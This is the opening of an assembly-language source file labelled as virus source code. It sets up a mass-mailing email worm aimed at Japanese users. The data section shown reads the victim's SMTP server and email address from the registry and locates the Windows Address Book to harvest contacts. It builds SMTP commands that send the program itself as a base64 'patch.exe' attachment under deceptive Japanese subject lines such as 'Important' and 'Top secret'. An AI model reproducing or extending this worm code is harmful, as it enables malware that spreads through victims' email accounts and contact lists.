japanize.asm

此為病毒源碼

	
	.586p
	.model flat
	locals
	jumps

	
;;;  some lazy shit
callW  macro	@@@x
	extrn	@@@x:proc
	call	@@@x
endm

ofs equ offset

dwo equ dword ptr
wo equ word ptr
by equ byte ptr

HKEY_CURRENT_USER	EQU	80000001h
CRLF		equ 	<13,10>
rdtsc	equ	<dw 310fh>
AF_INET		equ	2
SOCK_STREAM	equ	1

FILE_ATTRIBUTE_NORMAL	EQU	00000080h
GENERIC_READ		EQU	80000000h
GENERIC_WRITE		EQU	40000000h
PAGE_READONLY		EQU	00000002h
PAGE_READWRITE		EQU	00000004h
FILE_MAP_READ		EQU	00000004h
OPEN_EXISTING		EQU	00000003h
GHND			EQU	042h
FILE_SHARE_READ		EQU	00000001h
FILE_SHARE_WRITE	EQU	00000002h
 

;;;  ----------------------------------------------------------------
	.data
hReg				dd	?;  registry handle
str_SMInternetAccountManager	db	'Software\Microsoft\Internet Account Manager',0
str_SMIAccounts			db	'Software\Microsoft\Internet Account Manager\Accounts\'
AccountIdx			db	9 dup(?);  account index
bufsiz_accountidx		dd	9;  size
	
str_DMA				db	'Default Mail Account',0
str_SMTPNAME			db	'SMTP Server',0
str_SMTPEmailAddr		db	'SMTP Email Address',0
str_SMWab4			db	'Software\Microsoft\WAB\WAB4\Wab File Name',0


SMTP_Server			db	50 dup(?)	;  default smtp server
bufsiz_SMTPSERVER		dd	50
morons_Mailaddr			db	256 dup(?)	;  mail address of moron :)
bufsiz_morons_mailaddr		dd	256
wab4_path			db	260 dup(?);  wab file path
bufsiz_wab4_path		dd	260

buffer	db	1000 dup(?)

hwab4file	dd	?		;  wab4 file handle
hwab4map	dd	?		;  
hwab4mapview	dd	?		;  

myfilename	db	260 dup(?)	;  handle of myself
hmyfile		dd	?
fsize		dd	?		;  file size

hmemout0	dd	?
ptr_myself	dd	?
hmemout		dd	?		;  globalalloc
ptr_base64buf	dd	?		;  globallock

target_mailaddr	db	48h dup(?)	;  

sockaddr_in	label byte		;
	sin_family	dw	?
	sin_port	dw	?
	sin_addr	dd	?
	sin_zero	db	8 dup(?)
len_sockaddr_in	=	$ - ofs sockaddr_in

sock	dd	?			;  socket descriptor

recv_buffer	db	1024	dup(?)	;  recv buffer

jflag		dd	0		;  japanese or not

smtp_HELO	db	'HELO localhost',CRLF
len_smtp_HELO	=	$ - ofs smtp_HELO
smtp_MAIL_FROM	db	'MAIL FROM: '
len_smtp_MAIL_FROM	=	$ - ofs smtp_MAIL_FROM
;crlf
smtp_RCPT_TO	db	'RCPT TO: '
len_smtp_RCPT_TO	=	$ - ofs smtp_RCPT_TO
;crlf
smtp_DATA	db	'DATA',CRLF
len_smtp_DATA	=	$ - ofs smtp_DATA
smtp_BODY_FROM	db	'FROM: '
len_smtp_BODY_FROM	=	$ - ofs smtp_BODY_FROM
smtp_BODY_TO	db	CRLF,'TO: '
len_smtp_BODY_TO	=	$ - ofs smtp_BODY_TO
smtp_BODY_SUBJECT	db	CRLF,'SUBJECT: Important',CRLF
len_smtp_BODY_SUBJECT	=	$ - ofs smtp_BODY_SUBJECT

smtp_DOT_CRLF	db	'.',CRLF
len_smtp_DOT_CRLF	=	$ - ofs smtp_DOT_CRLF
smtp_QUIT	db	'QUIT',CRLF
len_smtp_QUIT	=	$ - ofs smtp_QUIT

smtp_crlf	db	CRLF

smtp_MIME_h	db	'MIME-Version: 1.0',CRLF
	db	'Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"',CRLF
	db	CRLF
	db	'--Boundary-a8dfidaoRadvfuck',CRLF
	db	'Content-Type: text/plain; charset=iso-2022-jp',CRLF
	db	'Content-Transfer-Encoding: 7bit',CRLF
	db	'Content-Description: Mail message body',CRLF
	db	CRLF
	db	CRLF			;  text
	db	CRLF
	db	'--Boundary-a8dfidaoRadvfuck',CRLF
	db	'Content-Type: application/x-msdownload; name="patch.exe"',CRLF
	db	'Content-Disposition: attachment;  filename="patch.exe"',CRLF
	db	'Content-Transfer-Encoding: BASE64',CRLF
	db	CRLF
len_smtp_MIME_h	=	$ - ofs smtp_MIME_h
	;;  base64 body
smtp_MIME_e	db	CRLF,'--Boundary-a8dfidaoRadvfuck--',CRLF,CRLF
len_smtp_MIME_e	=	$ - ofs smtp_MIME_e

r_seed		dd	10987293h	;  random seed


smtp_jsubject_1	db	CRLF,'SUBJECT: =?ISO-2022-JP?B?'
len_smtp_jsubject_1	=	$ - ofs smtp_jsubject_1
smtp_jsubject_2	db	'?=',CRLF
len_smtp_jsubject_2	=	$ - ofs smtp_jsubject_2


;;;  japanese subjects table
japanese_subjects	label	byte
	dd	ofs js_01
	dd	ofs js_02
	dd	ofs js_03
	dd	ofs js_04
	dd	ofs js_05
	dd	ofs js_06
	dd	ofs js_07
	dd	ofs js_08
	dd	ofs js_09
	dd	ofs js_10
	dd	ofs js_11
	dd	ofs js_12
	dd	ofs js_13
	dd	ofs js_14
	dd	ofs js_15
	dd	ofs js_16
	dd	ofs js_17
num_of_jsub	=	($ - ofs japanese_subjects)/4
js_01	db	'GyRCPUVNVxsoQg==',0	;  廳梫
js_02	db	'UmU6GyRCPUVNVxsoQg==',0;  Re:廳梫
js_03	db	'GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0;  廳梫側偍抦傜偣
js_04	db	'UmU6GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0;  Re:廳梫側偍偟傜偣
js_05	db	'GyRCTmMkTjdvGyhC',0	;  椺偺審
js_06	db	'UmU6GyRCTmMkTjdvGyhC',0;  Re:椺偺審
js_07	db	'GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0;  偍媣偟傇傝偱偡
js_08	db	'UmU6GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0;  Re:偍媣偟傇傝偱偡
js_09	db	'GyRCJDMkcyRLJEEkTxsoQg==',0;  偙傫偵偪偼
js_10	db	'UmU6GyRCJDMkcyRLJEEkTxsoQg==',0;  Re:偙傫偵偪偼
js_11	db	'GyRCNktIaxsoQg==',0	;  嬌旈
js_12	db	'UmU6GyRCNktIaxsoQg==',0;  Re:嬌旈
js_13	db	'GyRCO3FOQRsoQg==',0	;  帒椏
js_14	db	'UmU6GyRCO3FOQRsoQg==',0;  Re:帒椏
js_15	db	'GyRCMz8bKEI=',0	;  晨